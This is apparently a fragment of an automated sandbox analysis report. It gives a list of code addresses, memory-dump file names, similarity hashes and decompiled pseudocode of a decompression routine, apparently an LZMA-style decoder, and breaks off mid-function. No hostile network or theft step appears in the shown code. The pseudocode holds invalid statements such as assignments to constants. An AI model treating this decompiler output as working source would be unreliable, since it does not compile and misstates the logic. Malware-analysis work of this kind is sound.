                                            0x004066a3
                                            0x004066a7
                                            0x004066d3
                                            0x004066d5
                                            0x004066dc
                                            0x004066df
                                            0x004066e2
                                            0x004066e2
                                            0x004066e7
                                            0x004066e7
                                            0x004066e9
                                            0x004066ec
                                            0x004066f3
                                            0x004066f6
                                            0x00406723
                                            0x00406723
                                            0x00406726
                                            0x00406729
                                            0x0040679d
                                            0x0040679d
                                            0x0040679d
                                            0x00000000
                                            0x0040679d
                                            0x0040672b
                                            0x00406731
                                            0x00406734
                                            0x00406737
                                            0x0040673a
                                            0x0040673d
                                            0x00406740
                                            0x00406743
                                            0x00406746
                                            0x00406749
                                            0x0040674c
                                            0x00406765
                                            0x00406767
                                            0x0040676a
                                            0x0040676b
                                            0x0040676e
                                            0x00406770
                                            0x00406773
                                            0x00406775
                                            0x00406777
                                            0x0040677a
                                            0x0040677c
                                            0x0040677f
                                            0x00406783
                                            0x00406785
                                            0x00406785
                                            0x00406786
                                            0x00406789
                                            0x0040678c
                                            0x0040674e
                                            0x0040674e
                                            0x00406756
                                            0x0040675b
                                            0x0040675d
                                            0x00406760
                                            0x00406760
                                            0x0040678f
                                            0x00406796
                                            0x00406720
                                            0x00406720
                                            0x00406720
                                            0x00406720
                                            0x00000000
                                            0x00406798
                                            0x00000000
                                            0x00406798
                                            0x00406796
                                            0x004066a9
                                            0x004066ac
                                            0x004066ae
                                            0x004066b1
                                            0x004066b4
                                            0x004066b7
                                            0x004066b9
                                            0x004066bc
                                            0x004066bf
                                            0x004066bf
                                            0x004066c2
                                            0x004066c2
                                            0x004066c5
                                            0x004066cc
                                            0x004066a0
                                            0x004066a0
                                            0x004066a0
                                            0x004066a0
                                            0x00000000
                                            0x004066ce
                                            0x00000000
                                            0x004066ce
                                            0x004066cc
                                            0x00406652

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b90b51789b68cdbba6ca9369e5ad938c532d61a1d7775d6d72ffdff9632d9f26
                                            • Instruction ID: c9a91825e94b1235ed1e5db661991067e3a312009d26920905f6c04b87fbb156
                                            • Opcode Fuzzy Hash: b90b51789b68cdbba6ca9369e5ad938c532d61a1d7775d6d72ffdff9632d9f26
                                            • Instruction Fuzzy Hash: 25913F71E00228CFDF28DFA8C8547ADBBB1FB44305F15816AD916BB291C3789A96DF44
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 98%
                                            			E00406520() {
                                            				unsigned short _t532;
                                            				signed int _t533;
                                            				void _t534;
                                            				void* _t535;
                                            				signed int _t536;
                                            				signed int _t565;
                                            				signed int _t568;
                                            				signed int _t589;
                                            				signed int* _t606;
                                            				void* _t613;
                                            
                                            				L0:
                                            				while(1) {
                                            					L0:
                                            					if( *(_t613 - 0x40) != 0) {
                                            						L89:
                                            						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
                                            						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
                                            						L69:
                                            						_t606 =  *(_t613 - 0x58);
                                            						 *(_t613 - 0x84) = 0x12;
                                            						L132:
                                            						 *(_t613 - 0x54) = _t606;
                                            						L133:
                                            						_t532 =  *_t606;
                                            						_t589 = _t532 & 0x0000ffff;
                                            						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                            						if( *(_t613 - 0xc) >= _t565) {
                                            							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                            							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                            							 *(_t613 - 0x40) = 1;
                                            							_t533 = _t532 - (_t532 >> 5);
                                            							 *_t606 = _t533;
                                            						} else {
                                            							 *(_t613 - 0x10) = _t565;
                                            							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                            							 *_t606 = (0x800 - _t589 >> 5) + _t532;
                                            						}
                                            						if( *(_t613 - 0x10) >= 0x1000000) {
                                            							L139:
                                            							_t534 =  *(_t613 - 0x84);
                                            							L140:
                                            							 *(_t613 - 0x88) = _t534;
                                            							goto L1;
                                            						} else {
                                            							L137:
                                            							if( *(_t613 - 0x6c) == 0) {
                                            								 *(_t613 - 0x88) = 5;
                                            								goto L170;
                                            							}
                                            							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                            							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                            							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                            							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                            							goto L139;
                                            						}
                                            					} else {
                                            						if( *(__ebp - 0x60) == 0) {
                                            							L171:
                                            							_t536 = _t535 | 0xffffffff;
                                            							L172:
                                            							return _t536;
                                            						}
                                            						__eax = 0;
                                            						_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                            						0 | _t258 = _t258 + _t258 + 9;
                                            						 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                            						L75:
                                            						if( *(__ebp - 0x64) == 0) {
                                            							 *(__ebp - 0x88) = 0x1b;
                                            							L170:
                                            							_t568 = 0x22;
                                            							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                            							_t536 = 0;
                                            							goto L172;
                                            						}
                                            						__eax =  *(__ebp - 0x14);
                                            						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                            						if(__eax >=  *(__ebp - 0x74)) {
                                            							__eax = __eax +  *(__ebp - 0x74);
                                            						}
                                            						__edx =  *(__ebp - 8);
                                            						__cl =  *(__eax + __edx);
                                            						__eax =  *(__ebp - 0x14);
                                            						 *(__ebp - 0x5c) = __cl;
                                            						 *(__eax + __edx) = __cl;
                                            						__eax = __eax + 1;
                                            						__edx = 0;
                                            						_t274 = __eax %  *(__ebp - 0x74);
                                            						__eax = __eax /  *(__ebp - 0x74);
                                            						__edx = _t274;
                                            						__eax =  *(__ebp - 0x68);
                                            						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                            						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                            						_t283 = __ebp - 0x64;
                                            						 *_t283 =  *(__ebp - 0x64) - 1;
                                            						 *( *(__ebp - 0x68)) = __cl;
                                            						L79:
                                            						 *(__ebp - 0x14) = __edx;
                                            						L80:
                                            						 *(__ebp - 0x88) = 2;
                                            					}
                                            					L1:
                                            					_t535 =  *(_t613 - 0x88);
                                            					if(_t535 > 0x1c) {
                                            						goto L171;
                                            					}
                                            					switch( *((intOrPtr*)(_t535 * 4 +  &M00406A77))) {
                                            						case 0:
                                            							if( *(_t613 - 0x6c) == 0) {
                                            								goto L170;
                                            							}
                                            							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                            							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                            							_t535 =  *( *(_t613 - 0x70));
                                            							if(_t535 > 0xe1) {
                                            								goto L171;
                                            							}
                                            							_t539 = _t535 & 0x000000ff;
                                            							_push(0x2d);
                                            							asm("cdq");
                                            							_pop(_t570);
                                            							_push(9);
                                            							_pop(_t571);
                                            							_t609 = _t539 / _t570;
                                            							_t541 = _t539 % _t570 & 0x000000ff;
                                            							asm("cdq");
                                            							_t604 = _t541 % _t571 & 0x000000ff;
                                            							 *(_t613 - 0x3c) = _t604;
                                            							 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                            							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
                                            							_t612 = (0x300 << _t604 + _t609) + 0x736;
                                            							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                            								L10:
                                            								if(_t612 == 0) {
                                            									L12:
                                            									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                            									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                            									goto L15;
                                            								} else {
                                            									goto L11;
                                            								}
                                            								do {
                                            									L11:
                                            									_t612 = _t612 - 1;
                                            									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                            								} while (_t612 != 0);
                                            								goto L12;
                                            							}
                                            							if( *(_t613 - 4) != 0) {
                                            								GlobalFree( *(_t613 - 4));
                                            							}
                                            							_t535 = GlobalAlloc(0x40, 0x600); // executed
                                            							 *(_t613 - 4) = _t535;
                                            							if(_t535 == 0) {
                                            								goto L171;
                                            							} else {
                                            								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                            								goto L10;
                                            							}
                                            						case 1:
                                            							L13:
                                            							__eflags =  *(_t613 - 0x6c);
                                            							if( *(_t613 - 0x6c) == 0) {
                                            								 *(_t613 - 0x88) = 1;
                                            								goto L170;
                                            							}
                                            							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                            							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                            							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                            							_t45 = _t613 - 0x48;
                                            							 *_t45 =  *(_t613 - 0x48) + 1;
                                            							__eflags =  *_t45;
                                            							L15:
                                            							if( *(_t613 - 0x48) < 4) {
                                            								goto L13;
                                            							}
                                            							_t547 =  *(_t613 - 0x40);
                                            							if(_t547 ==  *(_t613 - 0x74)) {
                                            								L20:
                                            								 *(_t613 - 0x48) = 5;
                                            								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                            								goto L23;
                                            							}
                                            							 *(_t613 - 0x74) = _t547;
                                            							if( *(_t613 - 8) != 0) {
                                            								GlobalFree( *(_t613 - 8)); // executed
                                            							}
                                            							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                            							 *(_t613 - 8) = _t535;
                                            							if(_t535 == 0) {
                                            								goto L171;
                                            							} else {
                                            								goto L20;
                                            							}
                                            						case 2:
                                            							L24:
                                            							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                            							 *(_t613 - 0x84) = 6;
                                            							 *(_t613 - 0x4c) = _t554;
                                            							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
                                            							goto L132;
                                            						case 3:
                                            							L21:
                                            							__eflags =  *(_t613 - 0x6c);
                                            							if( *(_t613 - 0x6c) == 0) {
                                            								 *(_t613 - 0x88) = 3;
                                            								goto L170;
                                            							}
                                            							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                            							_t67 = _t613 - 0x70;
                                            							 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                            							__eflags =  *_t67;
                                            							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                            							L23:
                                            							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                            							if( *(_t613 - 0x48) != 0) {
                                            								goto L21;
                                            							}
                                            							goto L24;
                                            						case 4:
                                            							goto L133;
                                            						case 5:
                                            							goto L137;
                                            						case 6:
                                            							__edx = 0;
                                            							__eflags =  *(__ebp - 0x40);
                                            							if( *(__ebp - 0x40) != 0) {
                                            								__eax =  *(__ebp - 4);
                                            								__ecx =  *(__ebp - 0x38);
                                            								 *(__ebp - 0x34) = 1;
                                            								 *(__ebp - 0x84) = 7;
                                            								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                            								goto L132;
                                            							}
                                            							__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                            							__esi =  *(__ebp - 0x60);
                                            							__cl = 8;
                                            							__cl = 8 -  *(__ebp - 0x3c);
                                            							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                            							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                            							__ecx =  *(__ebp - 0x3c);
                                            							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                            							__ecx =  *(__ebp - 4);
                                            							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                            							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                            							__eflags =  *(__ebp - 0x38) - 4;
                                            							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                            							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                            							if( *(__ebp - 0x38) >= 4) {
                                            								__eflags =  *(__ebp - 0x38) - 0xa;
                                            								if( *(__ebp - 0x38) >= 0xa) {
                                            									_t98 = __ebp - 0x38;
                                            									 *_t98 =  *(__ebp - 0x38) - 6;
                                            									__eflags =  *_t98;
                                            								} else {
                                            									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                            								}
                                            							} else {
                                            								 *(__ebp - 0x38) = 0;
                                            							}
                                            							__eflags =  *(__ebp - 0x34) - __edx;
                                            							if( *(__ebp - 0x34) == __edx) {
                                            								__ebx = 0;
                                            								__ebx = 1;
                                            								goto L61;
                                            							} else {
                                            								__eax =  *(__ebp - 0x14);
                                            								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                            								__eflags = __eax -  *(__ebp - 0x74);
                                            								if(__eax >=  *(__ebp - 0x74)) {
                                            									__eax = __eax +  *(__ebp - 0x74);
                                            									__eflags = __eax;
                                            								}
                                            								__ecx =  *(__ebp - 8);
                                            								__ebx = 0;
                                            								__ebx = 1;
                                            								__al =  *((intOrPtr*)(__eax + __ecx));
                                            								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                            								goto L41;
                                            							}
                                            						case 7:
                                            							__eflags =  *(__ebp - 0x40) - 1;
                                            							if( *(__ebp - 0x40) != 1) {
                                            								__eax =  *(__ebp - 0x24);
                                            								 *(__ebp - 0x80) = 0x16;
                                            								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                            								__eax =  *(__ebp - 0x28);
                                            								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                            								__eax =  *(__ebp - 0x2c);
                                            								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                            								__eax = 0;
                                            								__eflags =  *(__ebp - 0x38) - 7;
                                            								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                            								__al = __al & 0x000000fd;
                                            								__eax = (__eflags >= 0) - 1 + 0xa;
                                            								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                            								__eax =  *(__ebp - 4);
                                            								__eax =  *(__ebp - 4) + 0x664;
                                            								__eflags = __eax;
                                            								 *(__ebp - 0x58) = __eax;
                                            								goto L69;
                                            							}
                                            							__eax =  *(__ebp - 4);
                                            							__ecx =  *(__ebp - 0x38);
                                            							 *(__ebp - 0x84) = 8;
                                            							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                            							goto L132;
                                            						case 8:
                                            							__eflags =  *(__ebp - 0x40);
                                            							if( *(__ebp - 0x40) != 0) {
                                            								__eax =  *(__ebp - 4);
                                            								__ecx =  *(__ebp - 0x38);
                                            								 *(__ebp - 0x84) = 0xa;
                                            								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                            							} else {
                                            								__eax =  *(__ebp - 0x38);
                                            								__ecx =  *(__ebp - 4);
                                            								__eax =  *(__ebp - 0x38) + 0xf;
                                            								 *(__ebp - 0x84) = 9;
                                            								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                            								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                            							}
                                            							goto L132;
                                            						case 9:
                                            							goto L0;
                                            						case 0xa:
                                            							__eflags =  *(__ebp - 0x40);
                                            							if( *(__ebp - 0x40) != 0) {
                                            								__eax =  *(__ebp - 4);
                                            								__ecx =  *(__ebp - 0x38);
                                            								 *(__ebp - 0x84) = 0xb;
                                            								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                            								goto L132;
                                            							}
                                            							__eax =  *(__ebp - 0x28);
                                            							goto L88;
                                            						case 0xb:
                                            							__eflags =  *(__ebp - 0x40);
                                            							if( *(__ebp - 0x40) != 0) {
                                            								__ecx =  *(__ebp - 0x24);
                                            								__eax =  *(__ebp - 0x20);
                                            								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                            							} else {
                                            								__eax =  *(__ebp - 0x24);
                                            							}
                                            							__ecx =  *(__ebp - 0x28);
                                            							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                            							L88:
                                            							__ecx =  *(__ebp - 0x2c);
                                            							 *(__ebp - 0x2c) = __eax;
                                            							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                            							goto L89;
                                            						case 0xc:
                                            							L99:
                                            							__eflags =  *(__ebp - 0x6c);
                                            							if( *(__ebp - 0x6c) == 0) {
                                            								 *(__ebp - 0x88) = 0xc;
                                            								goto L170;
                                            							}
                                            							__ecx =  *(__ebp - 0x70);
                                            							__eax =  *(__ebp - 0xc);
                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            							_t334 = __ebp - 0x70;
                                            							 *_t334 =  *(__ebp - 0x70) + 1;
                                            							__eflags =  *_t334;
                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            							__eax =  *(__ebp - 0x2c);
                                            							goto L101;
                                            						case 0xd:
                                            							L37:
                                            							__eflags =  *(__ebp - 0x6c);
                                            							if( *(__ebp - 0x6c) == 0) {
                                            								 *(__ebp - 0x88) = 0xd;
                                            								goto L170;
                                            							}
                                            							__ecx =  *(__ebp - 0x70);
                                            							__eax =  *(__ebp - 0xc);
                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            							_t122 = __ebp - 0x70;
                                            							 *_t122 =  *(__ebp - 0x70) + 1;
                                            							__eflags =  *_t122;
                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            							L39:
                                            							__eax =  *(__ebp - 0x40);
                                            							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                            							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                            								goto L48;
                                            							}
                                            							__eflags = __ebx - 0x100;
                                            							if(__ebx >= 0x100) {
                                            								goto L54;
                                            							}
                                            							L41:
                                            							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                            							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                            							__ecx =  *(__ebp - 0x58);
                                            							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                            							 *(__ebp - 0x48) = __eax;
                                            							__eax = __eax + 1;
                                            							__eax = __eax << 8;
                                            							__eax = __eax + __ebx;
                                            							__esi =  *(__ebp - 0x58) + __eax * 2;
                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                            							__ax =  *__esi;
                                            							 *(__ebp - 0x54) = __esi;
                                            							__edx = __ax & 0x0000ffff;
                                            							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                            							__eflags =  *(__ebp - 0xc) - __ecx;
                                            							if( *(__ebp - 0xc) >= __ecx) {
                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                            								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                            								__cx = __ax;
                                            								 *(__ebp - 0x40) = 1;
                                            								__cx = __ax >> 5;
                                            								__eflags = __eax;
                                            								__ebx = __ebx + __ebx + 1;
                                            								 *__esi = __ax;
                                            							} else {
                                            								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                            								 *(__ebp - 0x10) = __ecx;
                                            								0x800 = 0x800 - __edx;
                                            								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                            								__ebx = __ebx + __ebx;
                                            								 *__esi = __cx;
                                            							}
                                            							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            							 *(__ebp - 0x44) = __ebx;
                                            							if( *(__ebp - 0x10) >= 0x1000000) {
                                            								goto L39;
                                            							} else {
                                            								goto L37;
                                            							}
                                            						case 0xe:
                                            							L46:
                                            							__eflags =  *(__ebp - 0x6c);
                                            							if( *(__ebp - 0x6c) == 0) {
                                            								 *(__ebp - 0x88) = 0xe;
                                            								goto L170;
                                            							}
                                            							__ecx =  *(__ebp - 0x70);
                                            							__eax =  *(__ebp - 0xc);
                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            							_t156 = __ebp - 0x70;
                                            							 *_t156 =  *(__ebp - 0x70) + 1;
                                            							__eflags =  *_t156;
                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            							while(1) {
                                            								L48:
                                            								__eflags = __ebx - 0x100;
                                            								if(__ebx >= 0x100) {
                                            									break;
                                            								}
                                            								__eax =  *(__ebp - 0x58);
                                            								__edx = __ebx + __ebx;
                                            								__ecx =  *(__ebp - 0x10);
                                            								__esi = __edx + __eax;
                                            								__ecx =  *(__ebp - 0x10) >> 0xb;
                                            								__ax =  *__esi;
                                            								 *(__ebp - 0x54) = __esi;
                                            								__edi = __ax & 0x0000ffff;
                                            								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                            								__eflags =  *(__ebp - 0xc) - __ecx;
                                            								if( *(__ebp - 0xc) >= __ecx) {
                                            									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                            									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                            									__cx = __ax;
                                            									_t170 = __edx + 1; // 0x1
                                            									__ebx = _t170;
                                            									__cx = __ax >> 5;
                                            									__eflags = __eax;
                                            									 *__esi = __ax;
                                            								} else {
                                            									 *(__ebp - 0x10) = __ecx;
                                            									0x800 = 0x800 - __edi;
                                            									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                            									__ebx = __ebx + __ebx;
                                            									 *__esi = __cx;
                                            								}
                                            								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            								 *(__ebp - 0x44) = __ebx;
                                            								if( *(__ebp - 0x10) >= 0x1000000) {
                                            									continue;
                                            								} else {
                                            									goto L46;
                                            								}
                                            							}
                                            							L54:
                                            							_t173 = __ebp - 0x34;
                                            							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                            							__eflags =  *_t173;
                                            							goto L55;
                                            						case 0xf:
                                            							L58:
                                            							__eflags =  *(__ebp - 0x6c);
                                            							if( *(__ebp - 0x6c) == 0) {
                                            								 *(__ebp - 0x88) = 0xf;
                                            								goto L170;
                                            							}
                                            							__ecx =  *(__ebp - 0x70);
                                            							__eax =  *(__ebp - 0xc);
                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            							_t203 = __ebp - 0x70;
                                            							 *_t203 =  *(__ebp - 0x70) + 1;
                                            							__eflags =  *_t203;
                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            							L60:
                                            							__eflags = __ebx - 0x100;
                                            							if(__ebx >= 0x100) {
                                            								L55:
                                            								__al =  *(__ebp - 0x44);
                                            								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                            								goto L56;
                                            							}
                                            							L61:
                                            							__eax =  *(__ebp - 0x58);
                                            							__edx = __ebx + __ebx;
                                            							__ecx =  *(__ebp - 0x10);
                                            							__esi = __edx + __eax;
                                            							__ecx =  *(__ebp - 0x10) >> 0xb;
                                            							__ax =  *__esi;
                                            							 *(__ebp - 0x54) = __esi;
                                            							__edi = __ax & 0x0000ffff;
                                            							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                            							__eflags =  *(__ebp - 0xc) - __ecx;
                                            							if( *(__ebp - 0xc) >= __ecx) {
                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                            								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                            								__cx = __ax;
                                            								_t217 = __edx + 1; // 0x1
                                            								__ebx = _t217;
                                            								__cx = __ax >> 5;
                                            								__eflags = __eax;
                                            								 *__esi = __ax;
                                            							} else {
                                            								 *(__ebp - 0x10) = __ecx;
                                            								0x800 = 0x800 - __edi;
                                            								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                            								__ebx = __ebx + __ebx;
                                            								 *__esi = __cx;
                                            							}
                                            							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            							 *(__ebp - 0x44) = __ebx;
                                            							if( *(__ebp - 0x10) >= 0x1000000) {
                                            								goto L60;
                                            							} else {
                                            								goto L58;
                                            							}
                                            						case 0x10:
                                            							L109:
                                            							__eflags =  *(__ebp - 0x6c);
                                            							if( *(__ebp - 0x6c) == 0) {
                                            								 *(__ebp - 0x88) = 0x10;
                                            								goto L170;
                                            							}
                                            							__ecx =  *(__ebp - 0x70);
                                            							__eax =  *(__ebp - 0xc);
                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            							_t365 = __ebp - 0x70;
                                            							 *_t365 =  *(__ebp - 0x70) + 1;
                                            							__eflags =  *_t365;
                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            							goto L111;
                                            						case 0x11:
                                            							goto L69;
                                            						case 0x12:
                                            							__eflags =  *(__ebp - 0x40);
                                            							if( *(__ebp - 0x40) != 0) {
                                            								__eax =  *(__ebp - 0x58);
                                            								 *(__ebp - 0x84) = 0x13;
                                            								__esi =  *(__ebp - 0x58) + 2;
                                            								goto L132;
                                            							}
                                            							__eax =  *(__ebp - 0x4c);
                                            							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                            							__ecx =  *(__ebp - 0x58);
                                            							__eax =  *(__ebp - 0x4c) << 4;
                                            							__eflags = __eax;
                                            							__eax =  *(__ebp - 0x58) + __eax + 4;
                                            							goto L130;
                                            						case 0x13:
                                            							__eflags =  *(__ebp - 0x40);
                                            							if( *(__ebp - 0x40) != 0) {
                                            								_t469 = __ebp - 0x58;
                                            								 *_t469 =  *(__ebp - 0x58) + 0x204;
                                            								__eflags =  *_t469;
                                            								 *(__ebp - 0x30) = 0x10;
                                            								 *(__ebp - 0x40) = 8;
                                            								L144:
                                            								 *(__ebp - 0x7c) = 0x14;
                                            								goto L145;
                                            							}
                                            							__eax =  *(__ebp - 0x4c);
                                            							__ecx =  *(__ebp - 0x58);
